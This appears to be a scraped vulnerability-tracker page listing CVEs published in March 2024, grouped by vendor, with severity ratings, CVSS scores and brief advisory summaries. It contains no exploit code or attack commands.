CVE-2024-28401Medium5.42024-03-15TOTOLINK X2000R before v1.0.0-B20231213.1013 contains a Store Cross-site scripting (XSS) vulnerability in Root Access Control under the Wireless Page.
CVE-2024-28403Medium5.42024-03-15TOTOLINK X2000R before V1.0.0-B20231213.1013 is vulnerable to Cross Site Scripting (XSS) via the VPN Page.
CVE-2024-26454Medium5.42024-03-15A Cross Site Scripting vulnerability in Healthcare-Chatbot through 9b7058a can occur via a crafted payload to the email1 or pwd1 parameter in login.php.
CVE-2024-28662Medium5.42024-03-13A Cross Site Scripting vulnerability exists in Piwigo before 14.3.0 script because of missing sanitization in create_tag in admin/include/functions.php.
CVE-2024-28339Medium5.42024-03-12An information leak in the debuginfo.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.
CVE-2023-43490Medium5.32024-03-14Incorrect calculation in microcode keying mechanism for some Intel(R) Xeon(R) D Processors with Intel(R) SGX may allow a privileged user to potentially enable information disclosure via local access.
CVE-2024-26521Medium4.82024-03-12HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.
CVE-2023-27502Low3.32024-03-14Insertion of sensitive information into log file for some Intel(R) Local Manageability Service software before version 2316.5.1.2 may allow an authenticated user to potentially enable information disclosure via local access.

Dedecms · 23 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28673High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/mychannel_edit.php.
CVE-2024-28671High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/stepselect_main.php.
CVE-2024-28684High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/module_main.php
CVE-2024-28675High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_edit.php
CVE-2024-28665High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_add.php
CVE-2024-28432High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_edit.php.
CVE-2024-28431High8.82024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_del.php.
CVE-2024-28682Medium6.32024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/sys_cache_up.php.
CVE-2024-28678Medium6.32024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_description_main.php
CVE-2024-28683Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via create file.
CVE-2024-28681Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/plus_edit.php.
CVE-2024-28680Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_add.php.
CVE-2024-28679Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via Photo Collection.
CVE-2024-28677Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/article_keywords_main.php.
CVE-2024-28676Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via /dede/article_edit.php.
CVE-2024-28670Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_main.php.
CVE-2024-28668Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/mychannel_add.php
CVE-2024-28667Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/templets_one_edit.php
CVE-2024-28430Medium6.12024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_edit.php.
CVE-2024-28666Medium5.52024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/media_add.php
CVE-2024-28429Medium5.52024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php
CVE-2024-28672Medium5.42024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/media_edit.php.
CVE-2024-28669Medium5.42024-03-13DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_edit.php.

Ibm · 13 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-22346High8.42024-03-14Db2 for IBM i 7.2, 7.3, 7.4, and 7.5 infrastructure could allow a local user to gain elevated privileges due to an unqualified library call.
CVE-2024-27266High8.22024-03-14IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data.
CVE-2023-38723Medium6.42024-03-13IBM Maximo Application Suite 7.6.1.3 is vulnerable to stored cross-site scripting.
CVE-2021-38938Medium6.22024-03-15IBM Host Access Transformation Services (HATS) 9.6 through 9.6.1.4 and 9.7 through 9.7.0.3 stores user credentials in plain clear text which can be read by a local user.
CVE-2023-47699Medium6.12024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-47162Medium6.12024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-47147Medium5.92024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 could allow an attacker to overwrite a log message under specific conditions.
CVE-2023-46182Medium5.42024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting.
CVE-2023-28517Medium5.42024-03-13IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 is vulnerable to cross-site scripting.
CVE-2023-43043Medium5.12024-03-13IBM Maximo Application Suite - Maximo Mobile for EAM 8.10 and 8.11 could disclose sensitive information to a local user.
CVE-2023-46179Medium4.32024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 does not set the secure attribute on authorization tokens or session cookies.
CVE-2023-46181Medium4.02024-03-15IBM Sterling Secure Proxy 6.0.3 and 6.1.0 allows web pages to be stored locally which can be read by another user on the system.
CVE-2023-32335Low3.72024-03-13IBM Maximo Application Suite 8.10, 8.11 and IBM Maximo Asset Management 7.6.1.3 stores sensitive information in URL parameters.

Phoenix Contact · 13 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25995Critical9.82024-03-12An unauthenticated remote attacker can modify configurations to perform a remote code execution, gain root rights or perform an DoS due to improper input validation.
CVE-2024-26288High8.72024-03-12An unauthenticated remote attacker can influence the communication due to the lack of encryption of sensitive data via a MITM.
CVE-2024-25999High8.42024-03-12An unauthenticated local attacker can perform a privilege escalation due to improper input validation in the OCPP agent service.
CVE-2024-26002High7.82024-03-12An improper input validation in the Qualcom plctool allows a local attacker with low privileges to gain root access by changing the ownership of specific files.
CVE-2024-26004High7.52024-03-12An unauthenticated remote attacker can DoS a control agent due to access of a uninitialized pointer which may prevent or disrupt the charging functionality.
CVE-2024-26003High7.52024-03-12An unauthenticated remote attacker can DoS the control agent due to a out-of-bounds read which may prevent or disrupt the charging functionality.
CVE-2024-26001High7.42024-03-12An unauthenticated remote attacker can write memory out of bounds due to improper input validation in the MQTT stack.
CVE-2024-25998High7.32024-03-12An unauthenticated remote attacker can perform a command injection in the OCPP Service with limited privileges due to improper input validation.
CVE-2024-26000Medium5.92024-03-12An unauthenticated remote attacker can read memory out of bounds due to improper input validation in the MQTT stack. The brute force attack is not always successful because of memory randomization.
CVE-2024-25997Medium5.32024-03-12An unauthenticated remote attacker can perform a log injection due to improper input validation.
CVE-2024-25996Medium5.32024-03-12An unauthenticated remote attacker can perform a remote code execution due to an origin validation error.
CVE-2024-25994Medium5.32024-03-12An unauthenticated remote attacker can upload a arbitrary script file due to improper input validation. The upload destination is fixed and is write only.
CVE-2024-26005Medium4.82024-03-12An unauthenticated remote attacker can gain service level privileges through an incomplete cleanup during service restart after a DoS.

Apache · 11 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-41313Critical9.82024-03-12The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks.
CVE-2024-28752Critical9.32024-03-15A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type.
CVE-2024-27894High8.52024-03-12The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL.
CVE-2024-27135High8.52024-03-12Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions.
CVE-2024-27317High8.42024-03-12In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files.
CVE-2022-34321High8.22024-03-12Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication.
CVE-2024-28746High8.12024-03-14Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access.  …
CVE-2024-24549High7.52024-03-13Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat.
CVE-2024-28098Medium6.42024-03-12The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings.
CVE-2024-23672Medium6.32024-03-13Denial of Service via incomplete cleanup vulnerability in Apache Tomcat.
CVE-2024-23944Medium5.32024-03-15Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check.

Fortinet · 9 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-48788Critical9.8KEV2024-03-12A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via…
CVE-2023-42789Critical9.82024-03-12A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows…
CVE-2023-47534Critical9.62024-03-12A improper neutralization of formula elements in a csv file in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, 7.0.0 through 7.0.10, 6.4.0 through 6.4.9, 6.2.0 through 6.2.9, 6.0.0 through 6.0.8 allows attacker to execute unauthorized…
CVE-2023-42790High8.12024-03-12A stack-based buffer overflow in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13…
CVE-2023-36554High8.12024-03-12A improper access control in Fortinet FortiManager version 7.4.0, version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.10, version 6.4.0 through 6.4.13, 6.2 all versions allows attacker to execute unauthorized code or commands via specia…
CVE-2024-23112High8.02024-03-12An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through…
CVE-2023-46717High7.52024-03-12An improper authentication vulnerability [CWE-287] in FortiOS versions 7.4.1 and below, versions 7.2.6 and below, and versions 7.0.12 and below when configured with FortiAuthenticator in HA may allow a readonly user to gain read-write acce…
CVE-2023-41842Medium6.72024-03-12A use of externally-controlled format string vulnerability [CWE-134] vulnerability in Fortinet allows a privileged attacker to execute unauthorized code or commands via specially crafted command arguments.
CVE-2024-21761Medium4.32024-03-12An improper authorization vulnerability [CWE-285] in FortiPortal version 7.2.0, and versions 7.0.6 and below reports may allow a user to download other organizations reports via modification in the request payload.

Leap13 · 9 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2399Medium6.42024-03-15The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user su…
CVE-2024-2239Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2238Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2237Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping.
CVE-2024-2000Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and…
CVE-2024-1997Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitiza…
CVE-2024-1996Medium6.42024-03-13The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user su…
CVE-2024-1680Medium6.42024-03-13The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insuff…
CVE-2024-0326Medium6.42024-03-13The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output…

Siemens · 9 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-22039Critical10.02024-03-12A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions < IP8), Cerberus PRO EN Fire Panel FC72x IP6 (All versions < IP6 SR3), Cerberus PRO EN Fire Panel FC72x IP7 (All versions < IP7 SR5), Cerberus PRO EN X20…
CVE-2022-32257Critical9.82024-03-12A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2).
CVE-2024-27907High7.82024-03-12A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000).
CVE-2024-22045High7.62024-03-12A vulnerability has been identified in SINEMA Remote Connect Client (All versions < V3.1 SP1).
CVE-2024-22044High7.52024-03-12A vulnerability has been identified in SENTRON 3KC ATC6 Expansion Module Ethernet (3KC9000-8TL75) (All versions).
CVE-2024-22041High7.52024-03-12A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x IP6 (All versions), Cerberus PRO EN Fire Panel FC72x IP7 (All versions), Cerberus PRO EN Fire Panel FC72x IP8 (All ver…
CVE-2024-22040High7.52024-03-12A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x IP6 (All versions), Cerberus PRO EN Fire Panel FC72x IP7 (All versions), Cerberus PRO EN Fire Panel FC72x IP8 (All ver…
CVE-2023-45793Medium5.52024-03-12A vulnerability has been identified in Siveillance Control (All versions >= V2.8 < V3.1.1).
CVE-2024-21483Medium4.62024-03-12A vulnerability has been identified in SENTRON 7KM PAC3120 AC/DC (7KM3120-0BA01-1DA0) (All versions >= V3.2.3 < V3.2.4 only when manufactured between LQN231003...

Cisco · 8 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-20320High7.82024-03-13A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileg…
CVE-2024-20327High7.42024-03-13A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting i…
CVE-2024-20318High7.42024-03-13A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition. This vulner…
CVE-2024-20262Medium6.52024-03-13A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) cond…
CVE-2024-20322Medium5.82024-03-13A vulnerability in the access control list (ACL) processing on Pseudowire interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due…
CVE-2024-20315Medium5.82024-03-13A vulnerability in the access control list (ACL) processing on MPLS interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to im…
CVE-2024-20266Medium5.32024-03-13A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulne…
CVE-2024-20319Medium4.32024-03-13A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Plane (SNMP) server of…

Code-projects · 8 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-41505Critical9.82024-03-13An arbitrary file upload vulnerability in the Add Student's Profile Picture function of Student Enrollment In PHP v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.
CVE-2024-24101Critical9.82024-03-12Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Eligibility Information Update.
CVE-2024-24093Critical9.82024-03-12SQL Injection vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via Personal Information Update information.
CVE-2023-41504High8.82024-03-13SQL Injection vulnerability in Student Enrollment In PHP 1.0 allows attackers to run arbitrary code via the Student Search function.
CVE-2024-24092High7.82024-03-12SQL Injection vulnerability in Code-projects.org Scholars Tracking System 1.0 allows attackers to run arbitrary code via login.php.
CVE-2023-42308Medium6.12024-03-12Cross Site Scripting (XSS) vulnerability in Manage Fastrack Subjects in Code-Projects Exam Form Submission 1.0 allows attackers to run arbitrary code via the "Subject Name" and "Subject Code" Section.
CVE-2023-42307Medium6.12024-03-12Cross Site Scripting (XSS) vulnerability in Code-Projects Exam Form Submission 1.0 allows attackers to run arbitrary code via "Subject Name" and "Subject Code" section.
CVE-2024-24097Medium5.42024-03-12Cross Site Scripting (XSS) vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via the News Feed.

Binhnguyenplus · 7 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-4731Medium4.32024-03-12The LadiApp plugn for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the init_endpoint() function hooked via 'init' in versions up to, and including, 4.4.
CVE-2023-4729Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4.
CVE-2023-4728Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4.
CVE-2023-4629Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3.
CVE-2023-4628Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the ladiflow_save_hook() function in versions up to, and including, 4.4.
CVE-2023-4627Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_config() function in versions up to, and including, 4.4.
CVE-2023-4626Medium4.32024-03-12The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and including, 4.3.

Sap · 7 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-22127Critical9.12024-03-12SAP NetWeaver Administrator AS Java (Administrator Log Viewer plug-in) - version 7.50, allows an attacker with high privileges to upload potentially dangerous files which leads to command injection vulnerability.
CVE-2024-27902Medium5.42024-03-12Applications based on SAP GUI for HTML in SAP NetWeaver AS ABAP - versions 7.89, 7.93, do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. A successful attack can allow a malicious atta…
CVE-2024-28163Medium5.32024-03-12Under certain conditions, Support Web Pages of SAP NetWeaver Process Integration (PI) - versions 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on In…
CVE-2024-25645Medium5.32024-03-12Under certain condition SAP NetWeaver (Enterprise Portal) - version 7.50 allows an attacker to access information which would otherwise be restricted causing low impact on confidentiality of the application and with no impact on Integrity…
CVE-2024-25644Medium5.32024-03-12Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application…
CVE-2024-22133Medium4.62024-03-12SAP Fiori Front End Server - version 605, allows altering of approver details on the read-only field when sending leave request information.
CVE-2024-27900Medium4.32024-03-12Due to missing authorization check, attacker with business user account in SAP ABAP Platform - version 758, 795, can change the privacy setting of job templates from shared to private.

Sciener · 7 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-7017Critical9.82024-03-15Sciener locks' firmware update mechanism do not authenticate or validate firmware updates if passed to the lock through the Bluetooth Low Energy service.
CVE-2023-7006Critical9.12024-03-15The unlockKey character in a lock using Sciener firmware can be brute forced through repeated challenge requests, compromising the locks integrity.
CVE-2023-7009High8.22024-03-15Some Sciener-based locks support plaintext message processing over Bluetooth Low Energy, allowing unencrypted malicious commands to be passed to the lock.
CVE-2023-7007High8.22024-03-15Sciener server does not validate connection requests from the GatewayG2, allowing an impersonation attack that provides the attacker the unlockKey field.
CVE-2023-6960High7.52024-03-15TTLock App virtual keys and settings are only deleted client side, and if preserved, can access the lock after intended deletion.
CVE-2023-7003Medium6.82024-03-15The AES key utilized in the pairing process between a lock using Sciener firmware and a wireless keypad is not unique, and can be reused to compromise other locks using the Sciener firmware.
CVE-2023-7004Medium6.52024-03-15The TTLock App does not employ proper verification procedures to ensure that it is communicating with the expected device, allowing for connection to a device that spoofs the MAC address of a lock, which compromises the legitimate locks in…

Beaverbuilder · 6 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1080Medium6.42024-03-13The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escap…
CVE-2024-1074Medium6.42024-03-13The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization an…
CVE-2024-0897Medium6.42024-03-13The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escap…
CVE-2024-0896Medium6.42024-03-13The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output esc…
CVE-2024-1038Medium5.42024-03-13The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input s…
CVE-2024-0871Medium5.42024-03-13The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2…

Tenda · 6 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2490High8.82024-03-15A vulnerability classified as critical was found in Tenda AC18 15.03.05.05.
CVE-2024-2489High8.82024-03-15A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05.
CVE-2024-2488High8.82024-03-15A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2487High8.82024-03-15A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2486High8.82024-03-15A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2485High8.82024-03-15A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical.

Delinea · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25652High7.62024-03-14In Delinea PAM Secret Server 11.4, it is possible for a user assigned "Administer Reports" permission and/or with access to Report functionality via UNLIMITED ADMIN MODE (with access to the Report functionality) to gain unauthorized access…
CVE-2024-25649Medium6.72024-03-14In Delinea PAM Secret Server 11.4, it is possible for an attacker (with Administrator access to the Secret Server machine) to read the following data from a memory dump: the decrypted master key, database credentials (when SQL Server Authe…
CVE-2024-25650Medium5.92024-03-14Insecure key exchange between Delinea PAM Secret Server 11.4 and the Distributed Engine 8.4.3 allows a PAM administrator to obtain the Symmetric Key (used to encrypt RabbitMQ messages) via crafted payloads to the /pre-authenticate, /authen…
CVE-2024-25651Medium5.32024-03-14User enumeration can occur in the Authentication REST API in Delinea PAM Secret Server 11.4.
CVE-2024-25653Medium4.32024-03-14Broken Access Control in the Report functionality of Delinea PAM Secret Server 11.4 allows unprivileged users, when Unlimited Admin Mode is enabled, to view system reports and modify custom reports via the Report functionality in the Web U…

Dell · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0161High7.22024-03-13Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability.
CVE-2024-0163Medium5.32024-03-13Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain a TOCTOU race condition vulnerability.
CVE-2024-0162Medium5.32024-03-13Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability.
CVE-2024-0173Low3.82024-03-13Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability.
CVE-2024-0154Low3.82024-03-13Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability.

Discourse · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27100Medium6.52024-03-15Discourse is an open source platform for community discussion.
CVE-2024-27085Medium6.52024-03-15Discourse is an open source platform for community discussion.
CVE-2024-28242Medium5.32024-03-15Discourse is an open source platform for community discussion.
CVE-2024-24827Medium5.32024-03-15Discourse is an open source platform for community discussion.
CVE-2024-24748Medium5.32024-03-15Discourse is an open source platform for community discussion.

Mattermost · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2450High8.82024-03-15Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to correctly verify account ownership when switching from email to SAML authentication, allowing an authenticated attacker to take…
CVE-2024-2445Medium6.12024-03-15Mattermost Jira plugin versions shipped with Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to escape user-controlled outputs when generating HTML pages, which allows an attacke…
CVE-2024-2446Medium4.32024-03-15Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to limit the number of @-mentions processed per message, allowing an authenticated attacker to crash the client applications of ot…
CVE-2024-24975Low3.52024-03-15Uncontrolled Resource Consumption in Mattermost Mobile versions before 2.13.0 fails to limit the size of the code block that will be processed by the syntax highlighter, allowing an attacker to send a very large code block and crash the mo…
CVE-2024-28053Low3.12024-03-15Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server.

Mitsubishi Electric Corporation · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1917Critical9.82024-03-15Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-1916Critical9.82024-03-15Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-1915Critical9.82024-03-15Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafte…
CVE-2024-0803Critical9.82024-03-15Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-0802Critical9.82024-03-15Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious co…

Ni · 5 CVEs

